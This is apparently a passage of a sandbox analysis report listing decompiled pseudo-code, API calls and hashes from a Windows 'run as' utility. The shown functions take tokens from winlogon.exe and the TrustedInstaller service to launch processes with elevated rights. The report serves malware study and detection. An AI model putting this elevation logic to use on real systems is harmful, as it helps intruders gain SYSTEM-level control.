                                                                                                                						_t177 = _t315[0x265e];
                                                                                                                						if(_t177 != 1) {
                                                                                                                							__eflags = _t177 - 2;
                                                                                                                							if(_t177 != 2) {
                                                                                                                								goto L37;
                                                                                                                							}
                                                                                                                							_push(L"16BITCOLOR");
                                                                                                                							goto L36;
                                                                                                                						} else {
                                                                                                                							_push(L"256COLOR");
                                                                                                                							L36:
                                                                                                                							E00401D1E(_t311);
                                                                                                                							L37:
                                                                                                                							if(_t315[0x2660] == _t286) {
                                                                                                                								__eflags = _t315[0x2662] - _t286;
                                                                                                                								if(_t315[0x2662] == _t286) {
                                                                                                                									__eflags = _t315[0x2664] - _t286;
                                                                                                                									if(_t315[0x2664] == _t286) {
                                                                                                                										__eflags = _t315[0x2666] - _t286;
                                                                                                                										if(_t315[0x2666] == _t286) {
                                                                                                                											L46:
                                                                                                                											_t178 = _t315[0x2a6e];
                                                                                                                											_t358 = _t178 - 3;
                                                                                                                											if(_t178 != 3) {
                                                                                                                												__eflags = _t178 - 2;
                                                                                                                												if(_t178 != 2) {
                                                                                                                													__eflags =  *_t311 - _t286;
                                                                                                                													if( *_t311 == _t286) {
                                                                                                                														_push(_t286);
                                                                                                                													} else {
                                                                                                                														_push(_t311);
                                                                                                                													}
                                                                                                                													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                                													L63:
                                                                                                                													_t293 = _t311;
                                                                                                                													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                                													_t312 = _t184;
                                                                                                                													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                                														_t363 = _t315[0x266c] - _t286;
                                                                                                                														if(_t315[0x266c] != _t286) {
                                                                                                                															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                                															_a4 = _a4 | 0xffffffff;
                                                                                                                															_a8 = _t286;
                                                                                                                															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                                															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                                														}
                                                                                                                													}
                                                                                                                													E004055D1(_t184,  &_v44);
                                                                                                                													return _t312;
                                                                                                                												}
                                                                                                                												E00405497( &_v92);
                                                                                                                												E00405497( &_v228);
                                                                                                                												E0040149F(__eflags,  &_v92);
                                                                                                                												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                                												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                                												_t204 = _a4;
                                                                                                                												__eflags =  *_a4;
                                                                                                                												if(__eflags != 0) {
                                                                                                                													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                                												}
                                                                                                                												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                                												_t207 = _v28;
                                                                                                                												__eflags = _t207;
                                                                                                                												_v16 = 0x40c4e8;
                                                                                                                												if(_t207 != 0) {
                                                                                                                													_v16 = _t207;
                                                                                                                												}
                                                                                                                												_v12 = _v12 | 0x00000400;
                                                                                                                												E004054B9( &_v228);
                                                                                                                												E004054B9( &_v92);
                                                                                                                												_t286 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												L58:
                                                                                                                												_t315 = _a8;
                                                                                                                												_t311 = _a4;
                                                                                                                												goto L63;
                                                                                                                											}
                                                                                                                											E00405497( &_v92);
                                                                                                                											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                                											_t359 =  *_t311 - _t286;
                                                                                                                											if( *_t311 != _t286) {
                                                                                                                												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                                											}
                                                                                                                											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                                											_t219 = _v28;
                                                                                                                											_v16 = 0x40c4e8;
                                                                                                                											if(_t219 != _t286) {
                                                                                                                												_v16 = _t219;
                                                                                                                											}
                                                                                                                											_v12 = _v12 | 0x00000400;
                                                                                                                											E004054B9( &_v92);
                                                                                                                											goto L58;
                                                                                                                										}
                                                                                                                										_push(L"HIGHDPIAWARE");
                                                                                                                										L45:
                                                                                                                										E00401D1E(_t311);
                                                                                                                										goto L46;
                                                                                                                									}
                                                                                                                									_push(L"DISABLEDWM");
                                                                                                                									goto L45;
                                                                                                                								}
                                                                                                                								_push(L"DISABLETHEMES");
                                                                                                                								goto L45;
                                                                                                                							}
                                                                                                                							_push(L"640X480");
                                                                                                                							goto L45;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                                					L10:
                                                                                                                					_v20 =  &_v1316;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402300
                                                                                                                • memset.MSVCRT ref: 0040233E
                                                                                                                • memset.MSVCRT ref: 00402356
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                • wcschr.MSVCRT ref: 00402387
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                                  • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                                  • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                                • wcschr.MSVCRT ref: 004023B7
                                                                                                                • memset.MSVCRT ref: 004023D9
                                                                                                                • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                                • wcschr.MSVCRT ref: 0040242B
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                                • memset.MSVCRT ref: 004024BE
                                                                                                                • memset.MSVCRT ref: 004024D1
                                                                                                                • _wtoi.MSVCRT ref: 00402519
                                                                                                                • _wtoi.MSVCRT ref: 0040252B
                                                                                                                • memset.MSVCRT ref: 00402561
                                                                                                                • memset.MSVCRT ref: 00402574
                                                                                                                • _wtoi.MSVCRT ref: 004025BC
                                                                                                                • _wtoi.MSVCRT ref: 004025CE
                                                                                                                • wcschr.MSVCRT ref: 004025F0
                                                                                                                • memset.MSVCRT ref: 0040260F
                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                                • _snwprintf.MSVCRT ref: 0040264C
                                                                                                                • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                                • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                                • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                                • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                                • API String ID: 2452314994-435178042
                                                                                                                • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                                • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                                • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                                				char _v0;
                                                                                                                				WCHAR* _v4;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t76;
                                                                                                                				void* _t82;
                                                                                                                				wchar_t* _t85;
                                                                                                                				void* _t86;
                                                                                                                				void* _t87;
                                                                                                                				intOrPtr _t92;
                                                                                                                				wchar_t* _t93;
                                                                                                                				intOrPtr _t95;
                                                                                                                				int _t106;
                                                                                                                				char* _t110;
                                                                                                                				intOrPtr _t115;
                                                                                                                				wchar_t* _t117;
                                                                                                                				intOrPtr _t124;
                                                                                                                				wchar_t* _t125;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int _t156;
                                                                                                                				void* _t159;
                                                                                                                				intOrPtr _t162;
                                                                                                                				void* _t177;
                                                                                                                				void* _t178;
                                                                                                                				void* _t179;
                                                                                                                				intOrPtr _t181;
                                                                                                                				int _t187;
                                                                                                                				intOrPtr _t188;
                                                                                                                				intOrPtr _t190;
                                                                                                                				intOrPtr _t198;
                                                                                                                				signed int _t205;
                                                                                                                				signed int _t206;
                                                                                                                
                                                                                                                				_t179 = __edx;
                                                                                                                				_t158 = __ecx;
                                                                                                                				_t206 = _t205 & 0xfffffff8;
                                                                                                                				E0040B550(0x1ccc, __ecx);
                                                                                                                				_t76 = E0040313D(_t158);
                                                                                                                				if(_t76 != 0) {
                                                                                                                					E0040AC52();
                                                                                                                					SetErrorMode(0x8001); // executed
                                                                                                                					_t156 = 0;
                                                                                                                					 *0x40fa70 = 0x11223344;
                                                                                                                					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                                					_t82 = E00405497( &_a8);
                                                                                                                					_a48 = 0x20;
                                                                                                                					_a40 = 0;
                                                                                                                					_a52 = 0;
                                                                                                                					_a44 = 0;
                                                                                                                					_a56 = 0;
                                                                                                                					E004056B5(_t158, __eflags, _t82, _a12);
                                                                                                                					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                                					 *_t206 = L"/SpecialRun";
                                                                                                                					_t85 = E0040585C( &_v0);
                                                                                                                					__eflags = _t85;
                                                                                                                					if(_t85 != 0) {
                                                                                                                						L8:
                                                                                                                						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                                						__eflags = _t86 - _t156;
                                                                                                                						if(_t86 < _t156) {
                                                                                                                							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                                							__eflags = _t87 - _t156;
                                                                                                                							if(_t87 >= _t156) {
                                                                                                                								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t41 = _t87 + 1; // 0x1
                                                                                                                								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                                								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                                								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                                								__eflags = _t117;
                                                                                                                								if(_t117 == 0) {
                                                                                                                									_a92 = _t156;
                                                                                                                									memset( &_a94, _t156, 0x208);
                                                                                                                									_a620 = _t156;
                                                                                                                									memset( &_a622, _t156, 0x208);
                                                                                                                									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                                									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t125 = _t124 + 0x5504;
                                                                                                                									_v4 = _t125;
                                                                                                                									_t187 = wcslen(_t125);
                                                                                                                									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                                									__eflags = _t187 + _t51 - 0x104;
                                                                                                                									if(_t187 + _t51 >= 0x104) {
                                                                                                                										_a620 = _t156;
                                                                                                                									} else {
                                                                                                                										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                                									}
                                                                                                                									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                                									_t132 = _t131 + 0x5504;
                                                                                                                									__eflags = _t132;
                                                                                                                									wcscpy(_t132,  &_a620);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							E00402F31(_t156);
                                                                                                                							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                                							_pop(_t159);
                                                                                                                							_a84 =  &_a8;
                                                                                                                							_a76 = 0x40cb0c;
                                                                                                                							_a88 = _t156;
                                                                                                                							_a80 = _t156;
                                                                                                                							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                                							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                                							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                                							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                                								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                                								__eflags = _t93;
                                                                                                                								if(_t93 < 0) {
                                                                                                                									E00406420();
                                                                                                                									__imp__CoInitialize(_t156);
                                                                                                                									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                                									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                                									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                                									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                                									E00402F31(1);
                                                                                                                									__imp__CoUninitialize();
                                                                                                                								} else {
                                                                                                                									E004065BE(_t159);
                                                                                                                								}
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                                								_a7356 = _t156;
                                                                                                                								_a7352 = _t156;
                                                                                                                								_a7340 = _t156;
                                                                                                                								_a7344 = _t156;
                                                                                                                								_a7348 = _t156;
                                                                                                                								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                                								_t110 =  &_a5288;
                                                                                                                								L6:
                                                                                                                								E004035FB(_t110);
                                                                                                                								L7:
                                                                                                                								E004054B9( &_v0);
                                                                                                                								E004099D4( &_a32);
                                                                                                                								E004054B9( &_v0);
                                                                                                                								_t106 = _t156;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t26 = _t86 + 1; // 0x1
                                                                                                                						_t173 = _t26;
                                                                                                                						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							E00402F31(_t156);
                                                                                                                						} else {
                                                                                                                							E00402FC6(_t173, __eflags, _t138);
                                                                                                                						}
                                                                                                                						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a68 =  &_a8;
                                                                                                                						_a60 = 0x40cb0c;
                                                                                                                						_a72 = _t156;
                                                                                                                						_a64 = _t156;
                                                                                                                						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                                						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                                						_a5280 = _t156;
                                                                                                                						_a5276 = _t156;
                                                                                                                						_a5264 = _t156;
                                                                                                                						_a5268 = _t156;
                                                                                                                						_a5272 = _t156;
                                                                                                                						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                                						_t110 =  &_a3212;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					__eflags = _a56 - 3;
                                                                                                                					if(_a56 != 3) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					__eflags = 1;
                                                                                                                					_a3212 = 0;
                                                                                                                					_a3208 = 0;
                                                                                                                					_a3196 = 0;
                                                                                                                					_a3200 = 0;
                                                                                                                					_a3204 = 0;
                                                                                                                					_v4 = 0;
                                                                                                                					_v0 = 0;
                                                                                                                					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                                					_t177 = 2;
                                                                                                                					_push(E0040584C( &_v0, _t177));
                                                                                                                					L0040B1F8();
                                                                                                                					_pop(_t178);
                                                                                                                					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
                                                                                                                					_t110 =  &_a1132;
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t106 = _t76 + 1;
                                                                                                                					L2:
                                                                                                                					return _t106;
                                                                                                                				}
                                                                                                                			}


                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                                				int _v8;
                                                                                                                				long _v12;
                                                                                                                				wchar_t* _v16;
                                                                                                                				void _v546;
                                                                                                                				long _v548;
                                                                                                                				void _v1074;
                                                                                                                				char _v1076;
                                                                                                                				void* __esi;
                                                                                                                				long _t84;
                                                                                                                				int _t87;
                                                                                                                				wchar_t* _t88;
                                                                                                                				int _t92;
                                                                                                                				void* _t93;
                                                                                                                				int _t94;
                                                                                                                				int _t96;
                                                                                                                				int _t99;
                                                                                                                				int _t104;
                                                                                                                				long _t105;
                                                                                                                				int _t110;
                                                                                                                				void** _t112;
                                                                                                                				int _t113;
                                                                                                                				intOrPtr _t131;
                                                                                                                				wchar_t* _t132;
                                                                                                                				int* _t148;
                                                                                                                				wchar_t* _t149;
                                                                                                                				int _t151;
                                                                                                                				void* _t152;
                                                                                                                				void* _t153;
                                                                                                                				int _t154;
                                                                                                                				void* _t155;
                                                                                                                				long _t160;
                                                                                                                
                                                                                                                				_t145 = __edx;
                                                                                                                				_t152 = __ecx;
                                                                                                                				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                                				_v12 = 0;
                                                                                                                				if(_t131 != 4) {
                                                                                                                					__eflags = _t131 - 5;
                                                                                                                					if(_t131 != 5) {
                                                                                                                						__eflags = _t131 - 9;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = _t131 - 8;
                                                                                                                							if(_t131 != 8) {
                                                                                                                								__eflags = _t131 - 6;
                                                                                                                								if(_t131 != 6) {
                                                                                                                									__eflags = _t131 - 7;
                                                                                                                									if(_t131 != 7) {
                                                                                                                										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									} else {
                                                                                                                										_t132 = __eax + 0x46b6;
                                                                                                                										_t148 = __eax + 0x48b6;
                                                                                                                										__eflags =  *_t148;
                                                                                                                										_v16 = _t132;
                                                                                                                										_v8 = __eax + 0x4ab6;
                                                                                                                										if( *_t148 == 0) {
                                                                                                                											_t88 = wcschr(_t132, 0x40);
                                                                                                                											__eflags = _t88;
                                                                                                                											if(_t88 != 0) {
                                                                                                                												_t148 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t153 = _t152 + 0x800;
                                                                                                                										E0040289F(_t153);
                                                                                                                										_t154 =  *(_t153 + 0xc);
                                                                                                                										__eflags = _t154;
                                                                                                                										if(_t154 == 0) {
                                                                                                                											_t87 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                										} else {
                                                                                                                											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                										}
                                                                                                                										__eflags = _t87;
                                                                                                                									}
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t84 = GetLastError();
                                                                                                                										L43:
                                                                                                                										_v12 = _t84;
                                                                                                                									}
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                								__eflags = _t92;
                                                                                                                								if(_t92 != 0) {
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								_t84 = _a28;
                                                                                                                								goto L43;
                                                                                                                							}
                                                                                                                							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                                							__eflags = _t93;
                                                                                                                							if(_t93 != 0) {
                                                                                                                								E00401306(_t93); // executed
                                                                                                                							}
                                                                                                                							_v8 = 0;
                                                                                                                							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                                							__eflags = _t94;
                                                                                                                							_v12 = _t94;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                                								__eflags = _t96;
                                                                                                                								_v12 = _t96;
                                                                                                                								if(_t96 == 0) {
                                                                                                                									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                									__eflags = _t99;
                                                                                                                									if(_t99 == 0) {
                                                                                                                										_v12 = GetLastError();
                                                                                                                									}
                                                                                                                									CloseHandle(_v8); // executed
                                                                                                                								}
                                                                                                                								RevertToSelf(); // executed
                                                                                                                							}
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                                						__eflags = _t104;
                                                                                                                						if(_t104 == 0) {
                                                                                                                							goto L44;
                                                                                                                						}
                                                                                                                						_v8 = 0;
                                                                                                                						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t149 = __eax + 0x44ac;
                                                                                                                					_t110 = wcslen(_t149);
                                                                                                                					__eflags = _t110;
                                                                                                                					if(_t110 <= 0) {
                                                                                                                						goto L44;
                                                                                                                					} else {
                                                                                                                						_v8 = 0;
                                                                                                                						__eflags = E00404EA9(_t149, _t110);
                                                                                                                						_t112 =  &_v8;
                                                                                                                						_push(_t112);
                                                                                                                						_push(_t149);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401DF9(_t145, __eflags);
                                                                                                                						} else {
                                                                                                                							L0040B1F8();
                                                                                                                							_push(_t112);
                                                                                                                							_push(_t152);
                                                                                                                							_t113 = E00401E44();
                                                                                                                						}
                                                                                                                						_v12 = _t113;
                                                                                                                						__eflags = _t113;
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v548 = 0;
                                                                                                                					memset( &_v546, 0, 0x208);
                                                                                                                					_v1076 = 0;
                                                                                                                					memset( &_v1074, 0, 0x208);
                                                                                                                					E00404C3C( &_v548);
                                                                                                                					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                                					_t151 = wcslen(??);
                                                                                                                					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                                					_t159 = _t151 + _t10 - 0x104;
                                                                                                                					if(_t151 + _t10 >= 0x104) {
                                                                                                                						_v1076 = 0;
                                                                                                                					} else {
                                                                                                                						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                                					}
                                                                                                                					_v8 = 0;
                                                                                                                					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                                					L14:
                                                                                                                					_t160 = _t105;
                                                                                                                					_v12 = _t105;
                                                                                                                					L15:
                                                                                                                					if(_t160 == 0) {
                                                                                                                						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                                							_v12 = GetLastError();
                                                                                                                						}
                                                                                                                						CloseHandle(_v8);
                                                                                                                					}
                                                                                                                					L44:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                			}


































                                                                                                                0x00402119
                                                                                                                0x00402119
                                                                                                                0x0040211b
                                                                                                                0x0040211e
                                                                                                                0x0040211e
                                                                                                                0x00402149
                                                                                                                0x00402151
                                                                                                                0x00402151
                                                                                                                0x00402157
                                                                                                                0x00402157
                                                                                                                0x004022cb
                                                                                                                0x004022d2
                                                                                                                0x004022d2

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
